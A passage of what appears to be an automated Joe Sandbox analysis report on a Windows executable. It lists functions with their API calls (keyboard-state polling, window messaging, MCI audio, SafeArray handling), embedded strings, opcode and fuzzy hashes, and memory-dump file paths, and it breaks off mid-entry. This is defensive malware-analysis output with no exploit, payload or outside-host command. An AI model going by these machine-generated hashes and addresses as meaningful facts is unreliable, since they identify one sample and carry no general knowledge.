                          • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                          • String ID:
                          • API String ID: 3969911579-0
                          • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                          • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                          • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                          • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                          • String ID: 0
                          • API String ID: 956284711-4108050209
                          • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                          • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                          • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                          • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                          • String ID: 0.0.0.0
                          • API String ID: 1965227024-3771769585
                          • Opcode ID: 076f4e753302d8e1360c69636e2804f45f3b9e513b8bc5fd0a6f442411ef1df6
                          • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                          • Opcode Fuzzy Hash: 076f4e753302d8e1360c69636e2804f45f3b9e513b8bc5fd0a6f442411ef1df6
                          • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                          APIs
                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: SendString$_memmove_wcslen
                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                          • API String ID: 369157077-1007645807
                          • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                          • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                          • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                          • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                          APIs
                          • GetParent.USER32 ref: 00445BF8
                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                          • __wcsicoll.LIBCMT ref: 00445C33
                          • __wcsicoll.LIBCMT ref: 00445C4F
                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: __wcsicoll$ClassMessageNameParentSend
                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                          • API String ID: 3125838495-3381328864
                          • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                          • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                          • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                          • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                          APIs
                          • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                          • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                          • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                          • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                          • SendMessageW.USER32(?,00000402,?), ref: 00449399
                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: MessageSend$CharNext
                          • String ID:
                          • API String ID: 1350042424-0
                          • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                          • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                          • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                          • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                          APIs
                            • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                            • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                          • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                          • _wcscpy.LIBCMT ref: 004787E5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                          • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                          • API String ID: 3052893215-2127371420
                          • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                          • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                          • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                          • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                          APIs
                          • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                          • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                          • __swprintf.LIBCMT ref: 0045E7F7
                          • _wprintf.LIBCMT ref: 0045E8B3
                          • _wprintf.LIBCMT ref: 0045E8D7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                          • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                          • API String ID: 2295938435-2354261254
                          • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                          • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                          • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                          • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: __swprintf_wcscpy$__i64tow__itow
                          • String ID: %.15g$0x%p$False$True
                          • API String ID: 3038501623-2263619337
                          • Opcode ID: 1bd516ca49f477e8a3ed3b5693b6511736bfb32664ccdf6525c3e88e5b2a74d5
                          • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                          • Opcode Fuzzy Hash: 1bd516ca49f477e8a3ed3b5693b6511736bfb32664ccdf6525c3e88e5b2a74d5
                          • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                          APIs
                          • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                          • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                          • __swprintf.LIBCMT ref: 0045E5F6
                          • _wprintf.LIBCMT ref: 0045E6A3
                          • _wprintf.LIBCMT ref: 0045E6C7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                          • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                          • API String ID: 2295938435-8599901
                          • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                          • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                          • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                          • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                          APIs
                          • timeGetTime.WINMM ref: 00443B67
                            • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                          • Sleep.KERNEL32(0000000A), ref: 00443B9F
                          • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
                          • SetActiveWindow.USER32(?), ref: 00443BEC
                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                          • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
                          • Sleep.KERNEL32(000000FA), ref: 00443C2D
                          • IsWindow.USER32(?), ref: 00443C3A
                          • EndDialog.USER32(?,00000000), ref: 00443C4C
                            • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                            • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                            • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                          • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                          • String ID: BUTTON
                          • API String ID: 1834419854-3405671355
                          • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                          • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                          • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                          • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                          • LoadStringW.USER32(00000000), ref: 00454040
                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                          • _wprintf.LIBCMT ref: 00454074
                          • __swprintf.LIBCMT ref: 004540A3
                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                          • API String ID: 455036304-4153970271
                          • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                          • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                          • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                          • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                          APIs
                          • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                          • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                          • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                          • _memmove.LIBCMT ref: 00467EB8
                          • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                          • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                          • _memmove.LIBCMT ref: 00467F6C
                          • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                          • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                          • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                          • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                          • String ID:
                          • API String ID: 2170234536-0
                          • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                          • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                          • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                          • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                          APIs
                          • GetKeyboardState.USER32(?), ref: 00453CE0
                          • SetKeyboardState.USER32(?), ref: 00453D3B
                          • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                          • GetKeyState.USER32(000000A0), ref: 00453D75
                          • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                          • GetKeyState.USER32(000000A1), ref: 00453DB5
                          • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                          • GetKeyState.USER32(00000011), ref: 00453DEF
                          • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                          • GetKeyState.USER32(00000012), ref: 00453E26
                          • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                          • GetKeyState.USER32(0000005B), ref: 00453E5D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: State$Async$Keyboard
                          • String ID:
                          • API String ID: 541375521-0
                          • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                          • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                          • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                          • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                          APIs
                          • GetDlgItem.USER32(?,00000001), ref: 004357DB
                          • GetWindowRect.USER32(00000000,?), ref: 004357ED
                          • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                          • GetDlgItem.USER32(?,00000002), ref: 0043586A
                          • GetWindowRect.USER32(00000000,?), ref: 0043587C
                          • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                          • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                          • GetWindowRect.USER32(00000000,?), ref: 004358EE
                          • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                          • GetDlgItem.USER32(?,000003EA), ref: 00435941
                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
